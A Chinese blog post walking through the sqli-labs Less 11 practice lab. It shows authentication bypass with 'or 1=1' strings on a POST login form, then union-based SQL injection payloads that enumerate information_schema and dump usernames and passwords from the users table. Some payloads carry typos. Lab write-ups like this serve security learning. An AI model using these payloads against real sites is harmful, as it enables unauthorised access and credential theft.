#sqli-labs less 11

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接： https://blog.csdn.net/qq_45106794/article/details/102628373

#sqli-labs less 11

终于到post的阶段了

首先试一下常见的弱口令

username:admin password:admin

结果就成功了。。。

算了，‘正规套路’去搞吧

顺便练练burp

在登陆框中写入 admin 111

接下来试试

admin’

111

得到>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘111’ LIMIT 0,1’ at line 1证明是单引号字符型

尝试用admin’or 1=1–+

admin’or ‘1’=‘1’ --+

发现admin’or ‘1’='1–+ 可以顺利绕过

接下来试着用admin’ order by n–+

通过改变n 发现到order by 3时 才回显错误

接着用admin’ union select 1,2–+ 来查看回显位，却一直不能成功

接着我试了在passwd=11’ union select 1,2–+,回显成功

这。。。我得查查

反正接下来在passwd这注入点进行攻击

11’nion select user(),version() --+

ok 用 常规的playload

union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’)–+

union select 1,(select group_concat(column_name)from information_schema.columns where table_name=‘users’)–+

union select 1,(select group_concat(username,’;’,password) from security.users)–+

(select group_concat(username,’;’,password) from security.users)–+

…